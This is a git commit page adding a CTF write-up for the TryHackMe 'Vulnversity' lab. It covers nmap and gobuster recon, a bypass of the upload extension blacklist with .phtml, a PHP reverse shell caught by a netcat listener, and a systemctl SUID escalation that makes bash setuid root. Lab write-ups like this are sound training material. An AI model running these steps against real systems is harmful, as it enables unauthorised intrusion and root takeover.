mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Add files via upload
This commit is contained in:
parent
de3116b3c3
commit
182c8d3a90
1 changed files with 146 additions and 0 deletions
146
TryHackMe/Vulnversity.md
Normal file
146
TryHackMe/Vulnversity.md
Normal file
|
@ -0,0 +1,146 @@
|
|||
# TryHackMe-Vulnversity
|
||||
|
||||
>Abdullah Rizwan | 15th September , 08 : 29 PM
|
||||
|
||||
#NMAP
|
||||
|
||||
```
|
||||
nmap -sC -sV $IP
|
||||
```
|
||||
|
||||
```
|
||||
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 20:30 EDT [11/18]
|
||||
Nmap scan report for 10.10.233.54
|
||||
Host is up (0.17s latency).
|
||||
Not shown: 994 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|
||||
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|
||||
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
|
||||
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|
||||
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
|
||||
3128/tcp open http-proxy Squid http proxy 3.5.12
|
||||
|_http-server-header: squid/3.5.12
|
||||
|_http-title: ERROR: The requested URL could not be retrieved
|
||||
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||
|_http-title: Vuln University
|
||||
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
|
||||
Host script results:
|
||||
|_clock-skew: mean: -7h39m58s, deviation: 2h18m34s, median: -8h59m59s
|
||||
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|
||||
| smb-os-discovery:
|
||||
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|
||||
| Computer name: vulnuniversity
|
||||
| NetBIOS computer name: VULNUNIVERSITY\x00
|
||||
| Domain name: \x00
|
||||
| FQDN: vulnuniversity
|
||||
|_ System time: 2020-09-15T11:30:49-04:00
|
||||
| smb-security-mode:
|
||||
| account_used: guest
|
||||
| authentication_level: user
|
||||
| challenge_response: supported
|
||||
|_ message_signing: disabled (dangerous, but default)
|
||||
| smb2-security-mode:
|
||||
| 2.02:
|
||||
|_ Message signing enabled but not required
|
||||
| smb2-time:
|
||||
| date: 2020-09-15T15:30:50
|
||||
|_ start_date: N/A
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 45.13 seconds
|
||||
````
|
||||
|
||||
## Dirbuster
|
||||
|
||||
```
|
||||
gobuster dir -u http://10.10.233.54:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
```
|
||||
|
||||
```
|
||||
Gobuster v3.0.1
|
||||
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||||
===============================================================
|
||||
[+] Url: http://10.10.233.54:3333
|
||||
[+] Threads: 10
|
||||
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
[+] Status codes: 200,204,301,302,307,401,403
|
||||
[+] User Agent: gobuster/3.0.1
|
||||
[+] Timeout: 10s
|
||||
===============================================================
|
||||
2020/09/15 20:40:18 Starting gobuster
|
||||
===============================================================
|
||||
/images (Status: 301)
|
||||
/css (Status: 301)
|
||||
/js (Status: 301)
|
||||
/fonts (Status: 301)
|
||||
/internal (Status: 301)
|
||||
```
|
||||
|
||||
`/internal` is a page where we can upload an image and through `/images` we can view it.
|
||||
|
||||
## Burpsuite
|
||||
|
||||
Now we can not upload a php reverse shell due to it's extension is not allowed so we can make wordlist of possible php extension to by pass blacklist
|
||||
|
||||
```
|
||||
.php
|
||||
.php3
|
||||
.php4
|
||||
.php5
|
||||
.phphtml
|
||||
.phpgif
|
||||
.gifphp
|
||||
```
|
||||
|
||||
`.phtml` is the only extension that is accepted so we are going to change our reverse shell's extension and then upload and set a net cat listener on our terminal
|
||||
|
||||
```
|
||||
nc -lvp 5555
|
||||
|
||||
```
|
||||
|
||||
And access the reverse shell on the web server
|
||||
|
||||
```
|
||||
http://10.10.233.54:3333/internal/uploads/php-reverse-shell.phtml
|
||||
```
|
||||
|
||||
## Stabilize Shell
|
||||
|
||||
First get a bash with `python -c 'import pty; pty.spawn("/bin/bash")'` Then
|
||||
|
||||
1. ctrl+z
|
||||
2. stty raw -echo
|
||||
3. type fg and press enter x2.
|
||||
|
||||
You will get a stabilize shell with auto tab complete and then `export TERM=xterm ` for using clear command.
|
||||
|
||||
|
||||
## Privilege Escalation
|
||||
|
||||
Now we have to find a file which has SUID means which can set SUID permissions so we can issue a command to find these files
|
||||
|
||||
`find / -perm /4000`
|
||||
|
||||
And we will find `sytemctl` which can set SUID
|
||||
|
||||
Now search for systemctl on `GTFOBINS` and slightly modifying the command `chmod +s /bin/bash` it will set SUID on bash to run as root
|
||||
|
||||
```
|
||||
TF=$(mktemp).service
|
||||
echo '[Service]
|
||||
Type=oneshot
|
||||
ExecStart=/bin/sh -c "chmod +s /bin/bash"
|
||||
[Install]
|
||||
WantedBy=multi-user.target' > $TF
|
||||
/bin/systemctl link $TF
|
||||
/bin/systemctl enable --now $TF
|
||||
```
|
||||
|
||||
Now run the command `bash-p` You will be root.
|
Loading…
Reference in a new issue